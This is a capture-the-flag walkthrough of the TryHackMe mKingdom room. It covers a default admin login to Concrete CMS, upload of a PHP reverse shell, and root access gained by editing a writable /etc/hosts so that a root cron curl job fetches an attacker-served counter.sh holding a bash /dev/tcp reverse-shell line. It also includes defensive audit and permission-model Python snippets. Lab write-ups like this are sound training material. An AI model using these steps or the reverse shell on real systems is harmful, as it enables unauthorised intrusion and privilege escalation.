# mKingdom

{% embed url="<https://tryhackme.com/r/room/mkingdom>" %}
Room Link
{% endembed %}

This work by Manav G Krishna is licensed under [CC BY-NC 4.0](http://creativecommons.org/licenses/by-nc/4.0/?ref=chooser-v1) <img src="/files/fgutP6VmsOsVHYVe8Cfh" alt="" data-size="line"><img src="/files/J1FStDkVaABJlaGdbdeX" alt="" data-size="line">

**`Machine IP`**: 10.10.54.202

**`Hosts file entry`**: echo '10.10.54.202 mkingdom.thm' | sudo tee -a /etc/hosts

**`Nmap Scan`**:

```bash
nmap -p- -A -v --min-rate 100 -oN mkingdom_thm -Pn mkingdom.thm

Nmap scan report for mkingdom.thm (10.10.54.202)
Host is up (0.16s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
85/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 0H N0! PWN3D 4G4IN
|_http-server-header: Apache/2.4.7 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=6/17%OT=85%CT=1%CU=36511%PV=Y%DS=2%DC=T%G=Y%TM=6670
OS:4B91%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=I%TS=8)SEQ(S
OS:P=106%GCD=1%ISR=10D%TI=Z%CI=I%TS=8)SEQ(SP=106%GCD=2%ISR=10E%TI=Z%CI=I%II
OS:=I%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7
OS:%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%
OS:W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)

Uptime guess: 0.010 days (since Mon Jun 17 19:59:48 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   165.85 ms 10.11.0.1
2   166.23 ms mkingdom.thm (10.10.54.202)
```

The scan results show that there is only one open port, port **`85`**, running an **`Apache web server`** (Apache httpd 2.4.7 on Ubuntu).

**`Checking out port 85`**:

<div align="left"><figure><img src="/files/rvotcwySCGHw1mpejJP4" alt=""><figcaption></figcaption></figure></div>

There was nothing interesting in the **`source code`** of the page.

We can download the **`image`** on this page and **`extract`** its **`metadata`** using **`exiftool`**, to see if it yields any useful information:

<div align="left"><figure><img src="/files/ykl4kkh3HSdvcpz4B91C" alt=""><figcaption></figcaption></figure></div>

**`Commands`**:

```bash
wget http://mkingdom.thm:85/img1.jpg
```

```bash
exiftool img1.jpg
```

<figure><img src="/files/feqeWRT5MiDbLVYS1wxk" alt=""><figcaption></figcaption></figure>

<div align="left"><figure><img src="/files/gy3pu3XmUjIjNuLaYMJm" alt=""><figcaption></figcaption></figure></div>

The **`Creator`** field is set to **`b0w53r`**, so the image was created by **`b0w53r`**.

Now we can do some **`directory busting`**:

**`Command`**:

```bash
dirsearch -u http://mkingdom.thm:85/
```

<figure><img src="/files/TF0S1yFeDaWH76XfnXmI" alt=""><figcaption></figcaption></figure>

There is a path named **`/app`**. We can check this out:

<figure><img src="/files/yL6htj6TwxnUl1BvvB1n" alt=""><figcaption></figcaption></figure>

The **`source code`** says that, upon clicking on **`JUMP`** we will be redirected to a **`castle`** page:

<figure><img src="/files/PiJ2Mnbb29tCH98bxIt9" alt=""><figcaption></figcaption></figure>

**`Doing the same`**:

<div align="left"><figure><img src="/files/hv6He2JZLNKd6VbSth8R" alt=""><figcaption></figcaption></figure></div>

<figure><img src="/files/xIJSf7vJRUZFt9Q4hKkA" alt=""><figcaption></figcaption></figure>

We are now at **`/app/castle`** page.

**`Exploring the page`**:

We can see what **`Wappalyzer`** tells us:

<div align="left"><figure><img src="/files/nd3O7ve1xyvQ1z0aK6pN" alt=""><figcaption></figcaption></figure></div>

The **`CMS`** (**`Content management system`**) being used is **`Concrete CMS`** - **`8.5.2`**.

The same information can be fetched by using a **`tool`** called **`cmseek`** and also by checking out the **`source code`** of the page:

**`Command`**:

```bash
cmseek -u http://mkingdom.thm:85/app/castle/
```

<figure><img src="/files/jJb1Cz3laIcIKLQm9jIA" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/E7xHXtSlizvZIZ7eyQjm" alt=""><figcaption></figcaption></figure>

Towards the **`bottom`** of the page we find this:

<figure><img src="/files/ropTQp3hNsKeaZuYpifN" alt=""><figcaption></figcaption></figure>

There is a **`Log In`** option. Apart from the **`CMS version`**, there was nothing of interest in the page's **`source code`**.

<figure><img src="/files/ryb1ELCWUp4GEFVICKnU" alt=""><figcaption></figcaption></figure>

Since we know the **`CMS`** being used, we can try to find out whether there are any **`default`** credentials:

<div align="left"><figure><img src="/files/fn86CFB8BjCp8WRFu2vJ" alt=""><figcaption></figcaption></figure></div>

The **`default`** username is **`admin`**, but there is **`no default`** password.

Now we can try out a few possible **`default passwords`** such as **`admin`**, **`password`**, **`password123`** etc. The correct **`password`** turned out to be **`password`** itself.

**`Logging in`**:

<div align="left"><figure><img src="/files/Tdpv6POvl5fRIb9CACU0" alt=""><figcaption></figcaption></figure></div>

<figure><img src="/files/RJRifmST2z2IlCHtInTt" alt=""><figcaption></figcaption></figure>

We are now logged in as **`admin`**. We are still not sure what the **`name`** we obtained earlier from the **`image`** on the root of the website was for. Now we can try to find some **`exploits`** for version **`8.5.2`** of **`Concrete CMS`**.

**`Finding exploits`**:

<figure><img src="/files/w1ej69rQZOpNczm6lcCZ" alt=""><figcaption></figcaption></figure>

{% embed url="<https://vulners.com/hackerone/H1:768322>" %}

**`Exploitation steps`**:

<figure><img src="/files/kwU0F24tgn7Sl6nazjIm" alt=""><figcaption></figcaption></figure>

**`Following the same`**:

1. **`Visiting Allowed File Types`**:

<div align="left"><figure><img src="/files/PrDCGQM5cmlmgOyN1QDl" alt=""><figcaption></figcaption></figure></div>

<figure><img src="/files/vPhkrFvrgbyktbwUWLAM" alt=""><figcaption></figcaption></figure>

2. **`Adding php extension and Saving`**:

<figure><img src="/files/iu9wqlALDKqj7u7uQmx8" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Kij4w2uLEId6L5OGyWRA" alt=""><figcaption></figcaption></figure>

3. **`Visiting File Manager`**:

<div align="left"><figure><img src="/files/ejfXRn6Ur7JSeKwdwTGp" alt=""><figcaption></figcaption></figure></div>

4. **`Fetching a PHP payload and Uploading`**:

In the **`POC`**, an **`msfvenom`** payload is what is being used. Instead we can use the **`PHP PentestMonkey`** one from **`revshells.com`**:

{% embed url="<https://www.revshells.com/>" %}

<div align="left"><figure><img src="/files/jbIops3Wj4TG8HdaXB82" alt=""><figcaption></figcaption></figure></div>

I have saved it as **`shell.php`**:

<figure><img src="/files/pmMTRw2zqXsPS8YuhFYF" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/QrbFZQzVmzs4pSp30Tfd" alt=""><figcaption></figcaption></figure>

<div align="left"><figure><img src="/files/ZRZI2anxPjuf4knVHTA3" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/eb8Nbmaw4R2Lyz7bMF05" alt=""><figcaption></figcaption></figure></div>

Click on **`Close`**.

The moment we close it we get this **`window`** saying - **`Upload Complete`**:

<figure><img src="/files/5njIejOlq8LP32UoPbGL" alt=""><figcaption></figcaption></figure>

Setting up a listener on port **`4444`**:

<div align="left"><figure><img src="/files/i0rJaQul1RcqsZTVhP9i" alt=""><figcaption></figcaption></figure></div>

Now, upon clicking the **`URL to File`** / **`Tracked URL`** link, the **`PHP`** shell should be **`triggered`** and we should get a **`connection`** on our listener.

We indeed have got the **`shell`** as **`www-data`**:

<figure><img src="/files/Fg2B7Yjv8RJCJXO9trN4" alt=""><figcaption></figcaption></figure>

**`Stabilizing the shell`**:

<figure><img src="/files/038ycqlRKFoD75r45cbP" alt=""><figcaption></figcaption></figure>

**`Enumeration`**:

We have **`two`** users other than root with a **`login shell`**, namely **`toad`** and **`mario`**:

<div align="left"><figure><img src="/files/NIBZwU4QvNhZRLCFHgX7" alt=""><figcaption></figcaption></figure></div>

Checking for **`binaries`** that have the **`SUID`** bit set:

**`Command`**:

```bash
find / -perm -u=s -type f 2>/dev/null
```

<figure><img src="/files/yjCTywBMBevGoNtB5jnK" alt=""><figcaption></figcaption></figure>

<div align="left"><figure><img src="/files/5odA87yb3bbDxCqSGg37" alt=""><figcaption></figcaption></figure></div>

The **`cat`** binary has the **`SUID`** bit set:

<figure><img src="/files/gruJ6lvZOiUdhuJ0aFx4" alt=""><figcaption></figcaption></figure>

This means the **`cat`** command will always run as the file's **`owner`** for as long as the **`SUID bit`** is set, in this case **`toad`**.

So fetching the **`root flag`** directly is **`not`** possible: even after becoming **`toad`**, **`toad`** simply can't **`traverse`** into the **`/root`** directory, even if the **`root`** flag itself had **`read permissions`** for **`others`** (**`toad`** in this case), because of the fully **`restrictive default permissions`** of the **`/root`** directory (**`drwx------`**). This would hold even if **`cat`** **`didn't`** have the **`SUID`** bit set. The same **`permission restriction`** is there by **`default`** on the **`/home/[user]`** directories too.

All users who are neither the **`owner`** of a file nor **`members`** of its **`group`** fall under **`others`**. The **`root flag`** could have been fetched if the **`owner`** of **`cat`** had been **`root`** along with the **`SUID bit`** being set.

**`Removing`** the **`SUID bit`** eases these **`restrictions`**: once the **`bit`** is removed, **`cat`** runs as the user **`running the command`**. So if we use **`cat`** after becoming **`mario`**, it runs as **`mario`**; if we use **`cat`** after becoming **`root`**, it runs as **`root`**. The **`owner`** of the **`binary`** then **`doesn't`** have any effect at all.

**`Checking out common directories`**:

This leads us to a **`database.php`** file within the directory - **`/var/www/html/app/castle/application/config`**:

<figure><img src="/files/phXJCatYijRR5dAO4Aph" alt=""><figcaption></figcaption></figure>

The file contains **`MySQL`** credentials, with **`toad`** as the **`username`**. The first thing that comes to mind is to try to **`get in as toad`** using the found **`password`**. But before that, let us check whether **`MySQL`** is running and whether we can **`connect`** to the **`database`**, which might contain some information about the other user, **`mario`**.

**`Checking out active network connections`**:

**`Command`**:

```bash
ss -tulpen
```

<figure><img src="/files/aJm748SPmG2PUSr8MfXV" alt=""><figcaption></figcaption></figure>

And we indeed notice port **`3306`** listening for connections on the machine's **`localhost`**.

**`Connecting to the database`**:

**`Command`**:

```bash
mysql -u toad -p   # the password will be prompted for
```

<figure><img src="/files/pZnQbhq0Y40ZB8l0uiqQ" alt=""><figcaption></figcaption></figure>

<div align="left"><figure><img src="/files/P6MqvpK2VTdvgoYKQ4Q9" alt=""><figcaption></figcaption></figure></div>

<figure><img src="/files/0DVZmacRO5DZ3NvfiQ4E" alt=""><figcaption></figcaption></figure>

The only thing we find is the **`admin's hashed password`** (**`password`**), the **`Concrete CMS`** **`login password`** that we used initially.

We can confirm it is the **`same`** after **`cracking`** it:

<div align="left"><figure><img src="/files/hIsURRsZbSSjILYvhuf3" alt=""><figcaption></figcaption></figure></div>

Nothing of interest in the **`database`**.

Now we try to get in as **`toad`** using **`su`**:

<div align="left"><figure><img src="/files/iAI8HtqyqDG3uUj20R2o" alt=""><figcaption></figcaption></figure></div>

As expected we are the user **`toad`**.

Now we can **`remove`** the **`SUID`** bit being set on **`cat`**:

**`Command`**:

```bash
chmod u-s /bin/cat
```

<div align="left"><figure><img src="/files/GlEI9RgyCnfA83dqrvqj" alt=""><figcaption></figcaption></figure></div>

Now the **`s`** is replaced with **`w`**. The **`SUID bit`** has been removed.

We don't have the **`user flag`** in **`toad's`** **`home`** directory. Let us now do some more **`enumeration`**.

**`Enumeration`**:

We can't run **`sudo`**:

<div align="left"><figure><img src="/files/H57MeJOnMe0eSgrRqf6U" alt=""><figcaption></figcaption></figure></div>

The **`.bashrc`** file gives us a **`base64`** encoded **`password token`**:

<figure><img src="/files/ACeQ0mJusGColikXCSJD" alt=""><figcaption></figcaption></figure>

<div align="left"><figure><img src="/files/JLDzPB4cfnDy1p80Dex5" alt=""><figcaption></figcaption></figure></div>

The **`same`** can be found out by fetching the **`environment variables`** too:

<figure><img src="/files/3lewxt2PduNxoGxDcD3Z" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/1SXNzaVPujOsu33BCfJP" alt=""><figcaption></figcaption></figure>

**`Decoding the PWD_TOKEN`**:

**`Command`**:

```bash
echo -n aWthVGVOVEFOdEVTCg== | base64 -d
```

<div align="left"><figure><img src="/files/SIeSrl2jst84O4TzeJ0F" alt=""><figcaption></figcaption></figure></div>

We get the **`password`**. This might be **`mario's password`**. We can try to **`get in`** as **`mario`** using **`su`**:

<div align="left"><figure><img src="/files/c1HmxVnMneeILqnTdDth" alt=""><figcaption></figcaption></figure></div>

We are now the user **`mario`**.

**`Enumeration`**:

We have the user flag in **`mario's`** **`home`** directory:

<figure><img src="/files/zrQJPw9F4lxPt8kNgwpu" alt=""><figcaption></figcaption></figure>

Firstly, we are able to use **`cat`** because we **`removed`** the **`SUID bit`** while we were **`toad`**; as mentioned before, **`cat`** now **`runs as mario`** itself. Secondly, the **`user flag's`** file **`owner`** and **`group`** are both **`root`**, so **`mario`** falls under **`others`**. The reason we can still **`read`** the **`flag`** is that **`others`** have **`read permissions`** on the **`file`** (**`r--`**).

If we **`hadn't removed`** the **`SUID bit`** before, upon trying to **`cat`** the **`user flag`** we would be getting this:

<div align="left"><figure><img src="/files/2hz7KAbdLa8iXNHTa4aK" alt=""><figcaption></figcaption></figure></div>

This is because, even though **`toad`** also falls under **`others`** in the context of the **`user flag`**, and **`others`** can read it even with the **`SUID bit`** set, it still **`doesn't work`** due to the **`permissions`** (**`drwx------`**) on **`mario's`** **`home`** directory (**`/home/mario`**). **`toad`** **`can't`** even **`traverse`** that directory in the first place to reach the **`user flag`**.

But we can still **`read`** the **`flag`** using other **`utilities`**, since only **`cat`** is what **`can't`** be used (**`without removing the bit`**):

<div align="left"><figure><img src="/files/hNPdJL7c0KbzF6OHAVrh" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/IVdokl5t8mlUNWPrHxo5" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/SQ8h1B6fV5SxGTjh66DS" alt=""><figcaption></figcaption></figure></div>

**`Privilege Escalation`**:

Checking for **`sudo`** **`rights`**/**`privs`**:

<figure><img src="/files/QMGFLMacPqTqXdSn46At" alt=""><figcaption></figcaption></figure>

The **`id`** command can be run with **`sudo`** rights:

<div align="left"><figure><img src="/files/mioGysW4Zs9N4csPQD0Y" alt=""><figcaption></figcaption></figure></div>

But this obviously seems to be something kept to derail us, a **`rabbit hole`**. There are **`no`** known methods to make use of **`id`** to **`privilege escalate`**.

We also have the **`pwfeedback`** option enabled in the **`sudoers`** entry. **`pwfeedback`** is a display feature that shows an **`asterisk`** for each character a user types of their **`password`**.

<figure><img src="/files/M5BEIWGYj1y2kzf91YzD" alt=""><figcaption></figcaption></figure>

To confirm if it is **`enabled`** we can see if **`asterisks`** are coming up when we enter **`mario's`** **`password`**:

<div align="left"><figure><img src="/files/i7hjVUKdUyNYn1Tbes3s" alt=""><figcaption></figcaption></figure></div>

We indeed see it. This leads us to, **`CVE-2019-18634`**.

**`CVE-2019-18634`**:

It is a **`sudo`** **`LPE vulnerability`** (local privilege escalation) that needs **`pwfeedback`** to be **`enabled`** for it to work. It is a **`BOF`** (buffer overflow) exploit.

<figure><img src="/files/n5RCDg8uPa66yb49aY2I" alt=""><figcaption></figcaption></figure>

But the **`sudo`** version must be lower than **`1.8.26`** for it to work.

Checking out the **`sudo`** version:

<div align="left"><figure><img src="/files/kz96txcC048X0Utm1ShX" alt=""><figcaption></figcaption></figure></div>

The version running on the machine is **`1.8.9p5`**. So the exploit **`won't`** work.

Now let us see if we have any **`cron jobs`** running. For this **`pspy`** can be used:

{% embed url="<https://github.com/DominicBreuker/pspy>" %}

The machine is **`64-bit`**:

<figure><img src="/files/76kJI5JXf98WerR4bJSB" alt=""><figcaption></figcaption></figure>

So we have to use **`64-bit`** compatible **`pspy`**:

<div align="left"><figure><img src="/files/cR85iTIgmkdrsIyngQJk" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/ail5vMlTkzpwUwlFtXYt" alt=""><figcaption></figcaption></figure></div>

Sending it to the **`target machine`** after setting up a **`python server`**:

<div align="left"><figure><img src="/files/Xi91J9GSKr0WAANwVZCm" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/PyXjUOWo2EWNj48DQYnk" alt=""><figcaption></figcaption></figure></div>

**`Command`**:

```bash
wget http://10.11.75.84:4545/pspy64   # the IP here is the tun0 interface IP
```

<figure><img src="/files/CilxoYZ53TmzslhkQ6F1" alt=""><figcaption></figcaption></figure>

**`Running it`**:

<figure><img src="/files/FnxUfusQQPfDQDUecHLP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9dwoSh0ZNnArJBHAFqDj" alt=""><figcaption></figcaption></figure>

This **`cron job`** running as **`root`** (**`UID=0`**) stands out to us:

```bash
curl mkingdom.thm:85/app/castle/application/counter.sh
```

A **`curl`** request is sent to **`mkingdom.thm`** on port **`85`** to **`fetch`** and **`execute`** a **`counter.sh`** script located at **`/app/castle/application/`**.

**`Checking out the scripts permissions`**:

<div align="left"><figure><img src="/files/5pK2HQJ4slpFOtGAs1Hn" alt=""><figcaption></figcaption></figure></div>

Only **`root`** has **`write access`** to it; we, as the user **`mario`**, have only **`read permissions`**. So **`editing`** this file to place a **`reverse shell`** is out of the picture.

But the **`curl`** request is being sent to the host **`mkingdom.thm`**. So let us check out the **`/etc/hosts`** file as this is used to map **`hostnames`** to **`IP addresses`**.

<div align="left"><figure><img src="/files/FX34n43An5fNUoJTfHpI" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="/files/m2C02ZqwsnXboxAAcxL0" alt=""><figcaption></figcaption></figure></div>

Here we are able to **`cat`** the **`hosts`** file out because the **`file`** has **`read permissions`** for **`others`** and, mainly, because the **`/etc`** directory has **`execute permissions`** for **`others`**. So it **`doesn't`** matter that the **`SUID bit`** is set on **`cat`** with **`toad`** as the **`owner`**: when we run **`cat /etc/hosts`** it still runs as **`toad`**, **`toad`** falls into **`others`**, and thanks to the **`execute permission`** on **`/etc`**, **`toad`** **`is able`** to **`traverse`** this directory.

<div align="left"><figure><img src="/files/wKvBaRJyNwVlHCX1t1Vr" alt=""><figcaption></figcaption></figure></div>

The **`hosts`** file's **`group`** is **`mario`** and we as **`mario`** have **`write permissions`** on the file.

**`Thought process`**:

Based on the **`cron job`** command, what we can do is **`edit`** the **`hosts file entry`** to point **`mkingdom.thm`** to our **`IP`** (**`tun0`**) and place a **`counter.sh`** file containing the **`reverse shell`** within **`app/castle/application/`**, after **`creating`** this exact **`directory structure`** on our **`attacker machine`**. We also have to set up a **`python server`** on port **`85`**. When the **`cron job`** runs, the **`curl`** request hits our **`IP`**, **`/app/castle/application/counter.sh`** is **`served`** via port **`85`**, and we get a **`root shell`** on the listener we set up.
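Two audit checks for the weaknesses this chain relies on: a root cron job that downloads a script by hostname over plain HTTP, and a hosts file that a non-root group can write. This is an added example with a constructed crontab sample, not code from the room; the `10.0.0.5` entry is made up, and the hostname and pipe detection are heuristics.

```python
"""Audit checks: cron jobs that fetch by hostname, and writable hosts files.
Constructed example; SAMPLE_CRONTAB is modelled on the job pspy revealed."""
import os
import re
import stat

FETCHER_RE = re.compile(r"\b(?:curl|wget)\b")
# Optional scheme, a dotted hostname or IPv4 literal, optional port, then a path.
URL_RE = re.compile(r"(?:(https?)://)?([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)(?::\d+)?/\S*")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b")

# Constructed /etc/crontab: first job mirrors the room, second is a harmless control.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
* * * * * root curl mkingdom.thm:85/app/castle/application/counter.sh | bash
0 3 * * * root wget -q -O /tmp/pkgs https://10.0.0.5/pkgs.txt
"""


def risky_cron_entries(crontab_text, system_crontab=True):
    """Return (user, host, reasons) for cron commands whose downloaded content
    can be swapped by whoever controls name resolution or the network path."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        fields = line.split()
        if not fields or line.startswith("#") or "=" in fields[0]:
            continue                                # blank, comment or VAR=value
        fetch = FETCHER_RE.search(line)
        url = URL_RE.search(line, fetch.end()) if fetch else None
        if not url:
            continue
        # /etc/crontab has a user field after the five time fields.
        user = fields[5] if system_crontab and len(fields) > 6 else "?"
        scheme, host = url.group(1), url.group(2)
        reasons = []
        if not IPV4_RE.match(host):
            reasons.append("target named by hostname: /etc/hosts or DNS can redirect it")
        if scheme != "https":
            reasons.append("plaintext HTTP: the server is not authenticated")
        if PIPE_TO_SHELL_RE.search(line):
            reasons.append("download piped straight into a shell")
        if reasons:
            findings.append((user, host, reasons))
    return findings


def hosts_write_risk(mode, gid):
    """Reasons a hosts file with these stat bits can be edited by non-root."""
    reasons = []
    if mode & stat.S_IWGRP and gid != 0:            # group-writable, group is not root
        reasons.append(f"group-writable by gid {gid}")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def check_hosts_file(path="/etc/hosts"):
    """Run hosts_write_risk against a real file on this machine."""
    st = os.stat(path)
    return hosts_write_risk(st.st_mode, st.st_gid)


if __name__ == "__main__":
    for user, host, reasons in risky_cron_entries(SAMPLE_CRONTAB):
        print(f"cron as {user} fetches from {host}: " + "; ".join(reasons))
    print("/etc/hosts:", check_hosts_file() or "not writable by group or others")
```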

**`Editing the file`**:

<div align="left"><figure><img src="/files/jnF9hSdwdkj4kIn65bsQ" alt=""><figcaption></figcaption></figure></div>

**`Creating the directory`**:

**`Command`**:

```bash
mkdir -p app/castle/application/
```

<div align="left"><figure><img src="/files/Iklc8RBVrGA8T0fBY1Ya" alt=""><figcaption></figcaption></figure></div>

The **`counter.sh`** file **`contents`**:

```bash
bash -c "bash -i >& /dev/tcp/10.11.75.84/445 0>&1"
```

<figure><img src="/files/KWo1KqrdqpCscXaDvz06" alt=""><figcaption></figcaption></figure>

Setting up the **`python server`**:

<div align="left"><figure><img src="/files/QydmRcCu2OCTIw3qafD2" alt=""><figcaption></figcaption></figure></div>

Setting up a listener on port **`445`**:

<div align="left"><figure><img src="/files/C3n88pvirjbOozkvlEbO" alt=""><figcaption></figcaption></figure></div>

Now we just wait for the **`cron job`** to **`run`**.

After a few seconds we can see that the **`counter.sh`** file got **`served`** from **`our machine`**:

<figure><img src="/files/U4wXy2ox6BZPB74ctRAA" alt=""><figcaption></figcaption></figure>

Now let us **`check`** out the listener:

<figure><img src="/files/b3iRLUrasbWYzkC0YUVt" alt=""><figcaption></figcaption></figure>

We indeed have got a **`connection`** as **`root`**.

The **`root flag`** can be read with **`cat`** since we **`removed`** the **`SUID bit`** from it while we were still **`toad`**:

<div align="left"><figure><img src="/files/YExmYEFLq3w0zLa9Uvyr" alt=""><figcaption></figcaption></figure></div>

Now if the **`bit`** was still set, we would get this:

<div align="left"><figure><img src="/files/l1ga8waxQJox5CJ8jYxd" alt=""><figcaption></figcaption></figure></div>

So we can use the methods we used before to **`read`** the **`flag`** (**`more, less, head, tail`**).

Default **`/root`** directory **`permissions`**:

<div align="left"><figure><img src="/files/1Q8zTCDwi1D60XGtDkCT" alt=""><figcaption></figcaption></figure></div>

Only **`read`**, **`write`** & **`execute`** for the **`owner`**, that is **`root`**.

We can also change the **`/root`** directory's **`permissions`**, so that **`cat`** with the **`bit`** set, which runs as **`toad`**, can **`traverse`** (**`execute permission`**) the **`/root`** directory when **`cat /root/root.txt`** is run, and **`will be`** able to **`read`** the **`flag`** since it has **`read permissions`** (**`r--`**) for **`others`**, under which **`toad`** falls:

**`Command`**:

```bash
chmod 755 /root
```

<div align="left"><figure><img src="/files/5WnkOLrl4UjJFazMSH0y" alt=""><figcaption></figcaption></figure></div>
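The permission reasoning used throughout this writeup (SUID `cat` running as `toad`, `/root` and `/home/mario` blocking traversal, `/etc` allowing it, and `chmod 755 /root` opening the flag up) can be checked against a small model of the POSIX access rules. This is an added example, not code from the room; the filesystem table is constructed from the permissions the writeup reports.

```python
"""Model of the POSIX access checks behind the cat/SUID discussion: reading a
file needs search (x) on every directory in the path plus read (r) on the
file, evaluated for the process's *effective* uid, which a SUID binary sets
to its owner. Constructed model, not code from the room."""
from dataclasses import dataclass


@dataclass
class Node:
    owner: str
    group: str
    mode: int            # permission bits only, e.g. 0o700
    setuid: bool = False


# Constructed filesystem mirroring the permissions reported in the writeup.
FS = {
    "/":                    Node("root", "root", 0o755),
    "/root":                Node("root", "root", 0o700),
    "/root/root.txt":       Node("root", "root", 0o644),
    "/home":                Node("root", "root", 0o755),
    "/home/mario":          Node("mario", "mario", 0o700),
    "/home/mario/user.txt": Node("root", "root", 0o644),
    "/etc":                 Node("root", "root", 0o755),
    "/etc/hosts":           Node("root", "mario", 0o664),
    "/bin":                 Node("root", "root", 0o755),
    "/bin/cat":             Node("toad", "root", 0o755, setuid=True),
}
GROUPS = {"root": {"root"}, "toad": {"toad"}, "mario": {"mario"}}


def _class_bits(node, user):
    """The rwx triplet that applies to `user`: owner, group or others."""
    if user == "root":                 # root bypasses DAC read/search checks
        return 0o7
    if user == node.owner:
        return (node.mode >> 6) & 0o7
    if node.group in GROUPS.get(user, ()):
        return (node.mode >> 3) & 0o7
    return node.mode & 0o7


def _walk_ok(path, euid):
    """Every directory leading to `path` must grant x (search) to euid."""
    parts = [p for p in path.split("/") if p]
    dirs = ["/"] + ["/" + "/".join(parts[:i]) for i in range(1, len(parts))]
    return all(_class_bits(FS[d], euid) & 0o1 for d in dirs)


def can_read(path, euid):
    return _walk_ok(path, euid) and bool(_class_bits(FS[path], euid) & 0o4)


def can_write(path, euid):
    return _walk_ok(path, euid) and bool(_class_bits(FS[path], euid) & 0o2)


def effective_uid(binary, user):
    """Who the process runs as: the file owner if SUID is set, else the caller."""
    node = FS[binary]
    return node.owner if node.setuid else user


def cat_can_read(path, user):
    """Can `user` read `path` through /bin/cat in the current FS state?"""
    return can_read(path, effective_uid("/bin/cat", user))


if __name__ == "__main__":
    print("mario, SUID cat -> user.txt:", cat_can_read("/home/mario/user.txt", "mario"))
    print("root,  SUID cat -> root.txt:", cat_can_read("/root/root.txt", "root"))
    FS["/bin/cat"].setuid = False      # chmod u-s /bin/cat
    print("mario, plain cat -> user.txt:", cat_can_read("/home/mario/user.txt", "mario"))
```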

Room solved!!

{% embed url="<https://tryhackme.com/p/gravereaper2038>" %}
Profile Link
{% endembed %}
